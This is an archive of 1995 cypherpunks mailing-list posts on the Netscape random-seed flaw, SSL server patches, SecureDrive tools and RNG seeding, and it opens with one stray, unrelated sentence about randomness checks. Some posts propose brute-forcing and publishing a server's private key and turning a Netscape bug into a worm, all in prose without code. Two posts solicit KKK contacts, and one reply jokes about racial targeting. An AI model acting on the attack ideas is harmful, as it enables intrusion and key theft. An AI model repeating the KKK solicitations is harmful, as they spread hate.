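The locked case has exactly half its bits set, so a bias check alone passes it; the autocorrelation and block-entropy checks are what expose the repeating pattern. The autocorrelation scan only looks 16 lags back, so a longer period would need a wider window.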




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: edgar@highnrg.sbay.org (Edgar Swank)
Date: Sat, 23 Sep 95 02:26:21 PDT
To: Cypherpunks          <cypherpunks@toad.com>
Subject: SecureDrive/Secure Device News
Message-ID: <79BVBD6w165w@highnrg.sbay.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

My thanks to Mark Grant who suggested re the Iomega zip Drive & Secure
Device:

    On Sat, 16 Sep 1995, Edgar Swank wrote:

    >problem is that the DOS file must be present when the CONFIG.SYS
    >DEVICE= statement for the SECDEV.SYS is processed. But the zip drive
    >driver is a TSR that doesn't get loaded until after all DEVICE
    >statements have been processed.

    There are programs around that will load DOS device drivers from
    the DOS command line after booting, there's one I've used at work
    called 'DEVLOD', but I don't know if it's commercial or freeware.
    If it's free it may be possible to find it on the Net somewhere.

I found several shareware/freeware programs which claim to have this
ability. The first one I tried,

    DMC35.ZIP       74710  11-29-93  Allows loading/unloading of dev. drivers
                                     /TSR's

did the job, loading SECDEV.SYS -after- the zip drive TSR was loaded.
Other possibilities, which are present in the SIMTEL archive in
the msdos/sysutil subdirectory would be,

comp.zip         5086  08-29-88  Load and unload device drivers after bootup
devic104.zip     7250  05-30-92  Load and unload device drivers after bootup
devlod.zip      18240  12-30-91  Dynamic load of device drivers after boot-up
drvins11.zip    12298  12-06-90  Load and unload device drivers after bootup
idrv01.zip      16369  04-10-92  Install/uninstall device drivers after
                                 bootup

although I haven't tried any of these.

- From a SecureDrive user comes the following warning:

    Norton Utilities' wipeinfo appears to CORRUPT a SecureDrive (1.3d)
    partition, as well as an SFS (1.17) one.

    That was with the F-PROT (2.19) anti-virus TSR in memory
    (virstop.exe). I did not encounter problems with it off.

I think the main fault would be with virstop.  The user didn't say,
but if virstop is loaded before sectsr, that could lead to bypassing
sectsr, accessing encrypted data directly, which is likely to corrupt
the whole partition.

A user has also informed me that RAWDSK11 (or RAWDRV11) is no longer
found at

   ftp.uni-duisburg.de: /pub/pc/misc/rawdsk11.zip

This is a utility useful with SecureDrive for tape backups. Since it's
a short program, I'll include a UUENCODED image of the file here. This
program does not do cryptography by itself, so ITAR does not apply.

Edgar Swank
SecureDrive Co-author

section 1 of uuencode 5.25 of file rawdrv11.zip    by R.E.M.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGKA894nNf3ah8DHAQHqfwP/ao6/+WwjDqv/DVfFHSupinSVq13tJurf
GwTGRHuztQQcqGsCmEJyd7VDJG5L/Hdcqqwq2VL0KYbkSEo4HhNuRuZlQfVbTCQ9
0U3ShLUf3HaFf3n+ZoyU+QRt/GMuF4DTCnUwPW/FNSvwI2JdjoRDliCG4HuRLr/X
ANKfSG9XxIc=
=U7/K
-----END PGP SIGNATURE-----

---
edgar@HighNRG.sbay.org
Keep Freestyle Alive!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 22 Sep 95 21:42:57 PDT
To: Stephan Somogyi <cypherpunks@toad.com
Subject: Re: "Gnusaic"? Why not a Gnu-Style Web Browser?
In-Reply-To: <v03003400ac88a55e4e4b@[198.93.25.99]>
Message-ID: <9509230442.AA07912@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Has anyone already created the necessary patches for Apache
><http://www.apache.org/>, or does anyone know whether the Apache dev
>team would be amenable to including conditional directives to allow the
>build of a secure version? If anyone is thinking of making the effort
>to create a publicly available secure server, Apache's probably the
>best source base to work with.

I can't speak for Apache but we have two of the developers in the building
here.  From what they have said security patches would be welcomed with open
arms. If anyone wants to do the same for the CERN server, we can roll it out
through W3C likewise.

The real issue though would be whether there was confidence in the security of
the system. Simply bolting SSL in in a cack-handed manner would not cut it IMHO.
Basically I would not recommend a release of such a system to the Apache group
unless I was happy with the security of the whole system. This may well
involve a number of fixes in the rest of the code.

I'm also very interested if anyone wants to brave S-HTTP, there is a public 
domain version in production. Basically the more people want to work on this 
type of stuff the better.

The main hassle is in programming the authorization stuff however... don't 
underestimate the amount of work involved in doing a good job there.

	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 22 Sep 95 22:16:31 PDT
To: aleph1@dfw.net (Aleph One)
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <Pine.SUN.3.90.950922194817.11370A-100000@dfw.net>
Message-ID: <199509230513.BAA23938@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Actually it allows you to imbed data and commands to run. What the latest
> MSWord virus did is imbed a virus dropper encoded in the word document
> and then run it through the dos debug command to make it a binary file
> (if you ever read the 40HEX virus magazine you should know how this works).
> From there it just run the dropper.

  You could make a worm out of this Netscape bug by having it look
for a user's homepage when it infects, and then inserting the
URL into that page.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rooster@ix.netcom.com (BRIAN PROBST )
Date: Sat, 23 Sep 95 01:48:01 PDT
To: GET@ix.netcom.com
Subject: No Subject
Message-ID: <199509230847.BAA22935@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


IN TOUCH TO THE LOCAL KLAVERN IN THE DALLAS AREA?IF SO THEN SEND ME 
E-MAIL AT:

                        ROOSTER@IX.NETCOM.COM




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Fri, 22 Sep 95 17:32:50 PDT
To: cypherpunks@toad.com
Subject: test
Message-ID: <199509230032.CAA28999@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rooster@ix.netcom.com (BRIAN PROBST )
Date: Sat, 23 Sep 95 02:53:19 PDT
To: cypherpunks@toad.com I WAS WONDERING HOW TO GET IN THE KKK.I LIVE IN DALLAS,       TEXAS.CAN YOU HELP ME? IF SO THEN YOU CAN E-MAIL ME AT:@ix.netcom.com
Subject: No Subject
Message-ID: <199509230953.CAA21280@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




                                            ROSTER@IX.NETCOM.COM 


                                                     THANK YOU!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 23 Sep 95 03:00:16 PDT
To: Dave_Neuenschwander@va.arca.com
Subject: Re: Fwd: Re: Project: a standard cell random number generator
Message-ID: <9509230959.AA23786@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Yes Fortezza cards can be instructed to produce a random number through one
>of its library calls (someday they'll have a real API).  One of the

I don't understand the parenthetical comment.  Are you saying the
API that the NSA defined isn't supported by everyone, isn't complete,
or is "bad"?
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Fri, 22 Sep 95 23:01:03 PDT
To: cypherpunks@toad.com
Subject: Re: The Next Hack
In-Reply-To: <199509211832.LAA24086@infinity.c2.org>
Message-ID: <4407p5$on4@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509211832.LAA24086@infinity.c2.org>, sameer@c2.org (sameer) writes:
> 	Now that we've seen that Netscape is doing a good job towards
> trying to fix the hole that Ian and David have uncovered, it's time to
> start looking at new things.
> 
> 	Given the recent post to the www-security list that was
> forwarded here, it seems like just replacing the server may not work
> for all the secure servers out there-- keys may have to be replaced as
> well. Let's find out.
> 
> Proposal for action:
> 
> 1) Reverse-engineer a server to see if the keygen phase uses
> a weak RNG seed. -- if so, determine the exact algorithm.
> 
> 2) Organize a net-wide search over the space of the RNG seed to 
> crack the private key of some well known secure server.
> 
> 3) Release the private key to the net.

  What exactly is the point of this?  We have:

	1) acknowledged that the RNG used in the server private-key
		generation has the same problem

	2) said that we will provide a patch early next week

	3) said that we will provide new certificates for all customers

	4) promised to make source code for our new seed generation code
		publicly available

  What else do you hope to gain by breaking a server key?  I think
the point has been made.  Is there anything else that you would
reasonably expect that we would do in response to a server key
being broken that we have not already done?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 23 Sep 95 07:30:22 PDT
To: perry@piermont.com
Subject: Re: Seeds which depend on machine states
Message-ID: <199509231430.HAA23116@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:19 AM 9/22/95 -0700, Patrick Horgan wrote:
> That assumes that you have some way of measuring the timing to microsecond
> precision.  On most machines I've been on, if you get something time-
> stamped, even if there is a microsecond portion of the timestamp it's
> meaningless because it wasn't based on a timer with the required precision.

On Windows there is a timer with the required precision -- not microsecond
accuracy of course -- microsecond precision.  For our purposes the less
accuracy the better.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Sat, 23 Sep 95 05:17:20 PDT
To: cypherpunks@toad.com
Subject: HEY!!! WAS: The Next Hack
Message-ID: <199509231217.FAA27504@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hey wait a minute!!!

You HAD stated a patch would be available by Friday.
Now we are at early next week.

I watched the stock rise in the face of bad facts.
Almost 25% of your stock changed hands yesterday.

For the moment, it seems to me, anyway, you're getting
a lot of work done here for dirt cheap. I don't know
cypher codes very well, but I know Wall St. codes really
well. And THEY ARE BEING VIOLATED! I am glad there is no
anonymity on Wall St. We are starting to get into the
realm of SEC action. And I could really care much about
what happens out on the list.

This is not a problem that lends itself to 'quick fixes'.
For the only "quick fix you can give is still insecure crypto".

That is the point of this.
You can't really fix it.
Most of us know it.
The lies mount up
on the stock price.

I normally couldn't care less, I'm a Coca-Cola trader.
My stock is at an all time high as I write this.
It's up over 1200% in 10 years. No one can match it. (even MSFT)

This is much worse than NEW COKE!

For you are now better off letting them break key after key,
server after server, until the laws change. 

I'd go back and talk to your management fast.
For now you've become a pawn in a political game.
And millions of dollars change hands daily as a result.

Soon they will halt your stock trading if this keeps up.

Something, in a way far worse than ever having Netscape cracked!

Think about it.

Love Always,

Carol Anne
ps I shipped all the postings to Washington already.

>  What exactly is the point of this?  We have:
>
>	1) acknowledged that the RNG used in the server private-key
>		generation has the same problem
>
>	2) said that we will provide a patch early next week
>
>	3) said that we will provide new certificates for all customers
>
>	4) promised to make source code for our new seed generation code
>		publicly available

>  What else do you hope to gain by breaking a server key?  I think
>Jeff Weinstein - Electronic Munitions Specialist
>Netscape Communication Corporation
>jsw@netscape.com - http://home.netscape.com/people/jsw
>Any opinions expressed above are mine.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGP6MIrpjEWs1wBlAQFh3QP8D+m5NyD4WNZEyOSzollcUDqEQusjxr5s
0t9455KBAGnvt/5UAyaQ0JdDqZ3wRePsoC9VVxHiiITjhZGbwalcgrDVmajAXVbG
T+Hm4PEpM7tWt+R6pMvjhGcP2ldtzZf+OErE/yCSPTooxuOX5H6bBpb5e88n0eqo
JpbxSBXgCX4=
=C7J9
-----END PGP SIGNATURE-----
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Sat, 23 Sep 95 04:47:45 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: The Next Hack
In-Reply-To: <4407p5$on4@tera.mcom.com>
Message-ID: <199509231147.HAA21618@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain



> In article <199509211832.LAA24086@infinity.c2.org>, sameer@c2.org
> (sameer) writes:

> > 	Now that we've seen that Netscape is doing a good job towards
> > trying to fix the hole that Ian and David have uncovered, it's time to
> > start looking at new things.

> > Proposal for action:


Jeff writes:
>   What else do you hope to gain by breaking a server key?  I think
> the point has been made.  Is there anything else that you would
> reasonably expect that we would do in response to a server key
> being broken that we have not already done?
> 
> 	--Jeff

Clearly the point that Sameer is making includes the Meta crypto creed,
which is that all security systems and their components should be
discussed and tested in public. That it is not enough to test
the client and that encryption contained in server products must
also be dragged into the daylight.

Harry Hawk			habs@panix.com
Freelancer for NetGuide Mag.
All comments are my own.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 23 Sep 95 09:31:19 PDT
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <199509231631.JAA17499@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:15 PM 9/23/95 DST, you wrote:
>Again, we're Spammed by a moron.
>Time to fire up the old remailers!
>[At least they do this on weekends, when we have
>time for creative revenge!] Hehehehehe...

Either that or someone left their terminal logged in.  The only better way
to assure a quick and painful death would have been to post them to a Black
Panther's mailing list.  Oh well...  Evolution in action!

|  Minister of Forced Caffinization in the DNRC   | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Sat, 23 Sep 95 06:42:24 PDT
To: cypherpunks@toad.com
Subject: (Fwd) Netscape Commerce Server and Certificates
Message-ID: <9509231342.AA03015@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


From www-security...

------- Forwarded Message Follows -------
Date:          Sat, 23 Sep 95 01:07:38
From:          <atri@netscape.com>
Subject:       Netscape Commerce Server and Certificates
To:            "john hemming ceo marketnet"  <johnhemming@mkn.co.uk>, www-security@ns2.rutgers.edu
Cc:            

The Commerce server is significantly less vulnerable because:

1. Key pairs are generated only once
2. Access to the actual server is limited for hackers to try to guess with
some accurace when the key pair was generated.
3. The time it takes to generate key pairs is about 5 seconds on a
reasonably powerful UNIX machine.  

4. Since the random number seed address space is 30 bits, even if one knew
approximately when the server key-pair was generated it only reduces this
down to say 20 bits.  Therefore the operation can take anywhere from (2**20
to 2**30) * 5 seconds = 5 million to 5 billion seconds.

5 million seconds = 57.8 days
5 billion seconds = 158 years

5.  We plan to have the patch available by next week

6.  You are right about server owners having to get new certificates.
Netscape and VeriSign will offer new six month certificates to all current
certificate owners at no charge.

--Atri

At 09:58 PM 9/22/95 PDT, John Hemming CEO MarketNet wrote:
>>Netscape Commerce server certificates use RSA key pairs generated by the
>>user, i.e. with "Netscape's shoddy random number genrator" (sic). All the
>>server running in "secure" mode need new RSA keys and certificates as noted
>>in the following excerpt from the official Netscape response.
>
>>"In addition, the current version of the Netscape Commerce Server has a
>>similar vulnerability during it's initial key-pair generation. Therefore, a
>>patch will be made available from Netscape and should be applied by Commerce
>>Server customers to generate a new key pair and server certificate."
>If that is really what Netscape have issued then it needs correcting unless
>for some reason RSA's private key is stored in the Commerce Server.  I would
>presume that a certificate request would be needed instead.
>
>There is really quite a high noise to signal ratio in dealing with the
>non randomness of the unix Navigator (which is what I understand 
>the problem to be).
>
>
>
>
____________________________________
Atri Chatterjee
Server Marketing
Netscape Communications Corporation
(415) 528-2834 (ph)
(415) 528-4120 (fax)



Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Sat, 23 Sep 95 08:54:43 PDT
To: cypherpunks@toad.com
Subject: MacRandoms
Message-ID: <199509231554.JAA16098@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain




I tried posting this a few days ago, but it evidently got lost because of
the problems with the list. Anyway, I've uploaded my random
number generation code for the Mac to:

ftp://ftp.csua.berkeley.edu/pub/cypherpunks/randomness/MacRandoms.sea.hqx

This file contains Colin Plumb's randpool code, my Macintosh wrapper for
it, and a nice 68K assembler implementation of MD5 as a bonus. Enjoy.

                                  -- Will




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Sat, 23 Sep 95 08:32:13 PDT
To: dmandl@panix.com (David Mandl)
Subject: Re: HEY!!! WAS: The Next Hack
In-Reply-To: <v01530509ac89d419964f@[166.84.250.21]>
Message-ID: <9509231531.AA20035@alpha>
MIME-Version: 1.0
Content-Type: text/plain



David Mandl writes:
 > Looks like we've got a perfect candidate for the first Official
 > Cypherpunks Press Release, folks.

Then sign me off.  If something that inane were to go out with the
word "cypherpunk" affixed to it, I'd cringe.  It could only be worse
if it ended with the catchphrase "hack the planet".  

[ David quoted the "Censored Girl": ]
 > >Hey wait a minute!!!
 > >
 > >You HAD stated a patch would be available by Friday.
 > >Now we are at early next week.
 > >
 > >I watched the stock rise in the face of bad facts.
 > >Almost 25% of your stock changed hands yesterday.

So?

 > >For the moment, it seems to me, anyway, you're getting
 > >a lot of work done here for dirt cheap. I don't know
 > >cypher codes very well, but I know Wall St. codes really
 > >well. And THEY ARE BEING VIOLATED! I am glad there is no
 > >anonymity on Wall St. We are starting to get into the
 > >realm of SEC action. And I could really care much about
 > >what happens out on the list.

I won't even dignify this by calling it speculation; it's simply and
absolutely wrong.  Any "Netscape insiders" are locked out; they
couldn't manipulate the stock price if they wanted to, and if they
have any brains in their heads at all they're absolutely the last
people on earth who'd make a move that stupid.  It won't be until
January at the very earliest that anyone who holds restricted shares
will be allowed to trade.  The stock's in all likelihood being bounced
back and forth between big technology funds, who don't give a rat's
ass about some security bug in the product.

 > >That is the point of this.
 > >You can't really fix it.
 > >Most of us know it.

Gee, I don't know that.

 > >The lies mount up
 > >on the stock price.

Huh?  Do you actually have any earthly idea how the market works?

 > >I normally couldn't care less, I'm a Coca-Cola trader.
 > >My stock is at an all time high as I write this.
 > >It's up over 1200% in 10 years. No one can match it. (even MSFT)
 > >
 > >This is much worse than NEW COKE!

Ridiculous.

 > >Soon they will halt your stock trading if this keeps up.

I'll eat my shoe if that happens.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 23 Sep 95 07:53:30 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Council of Europe proposes to outlaw strong encryption (fwd)
In-Reply-To: <199509221509.LAA09991@panix.com>
Message-ID: <199509231453.KAA05871@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Duncan Frissell writes:
> Question for Perry -- I'm assuming that it will soon be possible to
> originate encrypted TCP/IP sessions with a distant "process" somewhere.  Do
> you see technical problems with a TCP/IP laundry being established
> "somewhere" that strips trace info from one of my processes and prevents
> back tracing beyond the mouth of this encrypted pipe?

It can be done (in some sense it's just an extension of the Socks
protocol), but I'm not sure how easy it will be to prevent all traffic
analysis on the thing. Also, if this gets done frequently, it sort of
screws up our attempts to keep up the efficiency of traffic in the network.

> Also Perry, what did you think of the article "How Anarchy Works" in the
> latest Wired on the IETF?

I haven't read it, although the IETF is certainly (whether it knows it
or not) an organization run on anarchist lines.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Sat, 23 Sep 95 09:01:16 PDT
To: dmandl@panix.com (David Mandl)
Subject: Re: HEY!!! WAS: The Next Hack
In-Reply-To: <v0153050aac89da46099c@[166.84.250.21]>
Message-ID: <9509231600.AA20401@alpha>
MIME-Version: 1.0
Content-Type: text/plain



David Mandl writes:
 > Sigh.  In case there was any misunderstanding, it was a JOKE.  I was making
 > a comment about "Censored Girl's" loony-bin post as well as recent
 > proposals that we should be issuing official press releases.  Surely my
 > subtle sense of humor isn't THAT subtle.  Here:

Sorry.  Caffeine deficit.  (Plus the added sensitivity of living in
the bizarre atmosphere of a recently-gone-public company.)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Sat, 23 Sep 95 08:13:31 PDT
To: cypherpunks@toad.com
Subject: Re: HEY!!! WAS: The Next Hack
Message-ID: <v01530509ac89d419964f@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


Looks like we've got a perfect candidate for the first Official Cypherpunks
Press Release, folks.

   --D.

At 7:16 AM 9/23/95, Censored Girls Anonymous wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Hey wait a minute!!!
>
>You HAD stated a patch would be available by Friday.
>Now we are at early next week.
>
>I watched the stock rise in the face of bad facts.
>Almost 25% of your stock changed hands yesterday.
>
>For the moment, it seems to me, anyway, you're getting
>a lot of work done here for dirt cheap. I don't know
>cypher codes very well, but I know Wall St. codes really
>well. And THEY ARE BEING VIOLATED! I am glad there is no
>anonymity on Wall St. We are starting to get into the
>realm of SEC action. And I could really care much about
>what happens out on the list.
>
>This is not a problem that lends itself to 'quick fixes'.
>For the only "quick fix you can give is still insecure crypto".
>
>That is the point of this.
>You can't really fix it.
>Most of us know it.
>The lies mount up
>on the stock price.
>
>I normally couldn't care less, I'm a Coca-Cola trader.
>My stock is at an all time high as I write this.
>It's up over 1200% in 10 years. No one can match it. (even MSFT)
>
>This is much worse than NEW COKE!
>
>For you are now better off letting them break key after key,
>server after server, until the laws change.
>
>I'd go back and talk to your management fast.
>For now you've become a pawn in a political game.
>And millions of dollars change hands daily as a result.
>
>Soon they will halt your stock trading if this keeps up.
>
>Something, in a way far worse than ever having Netscape cracked!
>
>Think about it.
>
>Love Always,
>
>Carol Anne
>ps I shipped all the postings to Washington already.
>
>>  What exactly is the point of this?  We have:
>>
>>       1) acknowledged that the RNG used in the server private-key
>>               generation has the same problem
>>
>>       2) said that we will provide a patch early next week
>>
>>       3) said that we will provide new certificates for all customers
>>
>>       4) promised to make source code for our new seed generation code
>>               publicly available
>
>>  What else do you hope to gain by breaking a server key?  I think
>>Jeff Weinstein - Electronic Munitions Specialist
>>Netscape Communication Corporation
>>jsw@netscape.com - http://home.netscape.com/people/jsw
>>Any opinions expressed above are mine.
>
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>
>iQCVAwUBMGP6MIrpjEWs1wBlAQFh3QP8D+m5NyD4WNZEyOSzollcUDqEQusjxr5s
>0t9455KBAGnvt/5UAyaQ0JdDqZ3wRePsoC9VVxHiiITjhZGbwalcgrDVmajAXVbG
>T+Hm4PEpM7tWt+R6pMvjhGcP2ldtzZf+OErE/yCSPTooxuOX5H6bBpb5e88n0eqo
>JpbxSBXgCX4=
>=C7J9
>-----END PGP SIGNATURE-----
>--
>
>Member Internet Society  - Certified BETSI Programmer  -  Webmistress
>***********************************************************************
>Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
>My Homepage
>The Cyberdoc
>***********************************************************************
>------------------ PGP.ZIP Part [017/713] -------------------
>M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
>MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
>MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
>-------------------------------------------------------------
>for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Sat, 23 Sep 95 09:16:03 PDT
To: cypherpunks@toad.com
Subject: ? Me?
Message-ID: <199509231615.JAA02784@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


What? Me? Write a Cypherpunks Press Release?

Love Always,

Alfreda E. Newman
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Sat, 23 Sep 95 09:19:39 PDT
To: cypherpunks@toad.com
Subject: Step One: We admitted
Message-ID: <199509231619.JAA15885@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


We admitted we were powerless over the prospect of a 
Cypherpunk Press Release. That our coding had become 
unmanageable.......

Love Always,

Carol Anne Coketrader
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Sat, 23 Sep 95 11:24:07 PDT
To: cypherpunks@toad.com
Subject: Seattle Cypherpunks
Message-ID: <199509231823.LAA15147@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Seattle-area Cypherpunks Get Together
Thursday, September 28
7:30 PM

Seattle Center House/Food Circus
Entrance opposite the Flag Pavilion

look for a table with a Compaq laptop busily signing keys

This is a very informal, unstructured get together.  More of a chance to
meet other folks with similar interests.  With all of the recent activities
in crypto-land, I'm sure there will be lots to talk about.  Bring a disk
with your key so I can put my ancient 386 laptop to some good use.  I'll
also load up some relatively new Windows crypto software for show and tell.

Eastsiders (Bellevue/Redmond environs) that don't feel like braving the
bridge, let me know.  I've got a van and will be headed west from Carnation
and would be happy to car-pool.

Hope to see you there...

Joel McNamara
joelm@eskimo.com - http://www.eskimo.com/~joelm for PGP key
Thomas Jefferson used strong crypto, shouldn't you?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 23 Sep 95 08:43:53 PDT
To: patrick@verity.com (Patrick Horgan)
Subject: Re: Seeds which depend on machine states
In-Reply-To: <9509221519.AA19310@cantina.verity.com>
Message-ID: <199509231543.LAA05907@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Patrick Horgan writes:
> > Try getting a human to type with the same timing, to microsecond
> > precision, the same way twice.
> > 
> That assumes that you have some way of measuring the timing to microsecond
> precision.

PCs have accurate microsecond timers.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Sat, 23 Sep 95 08:46:30 PDT
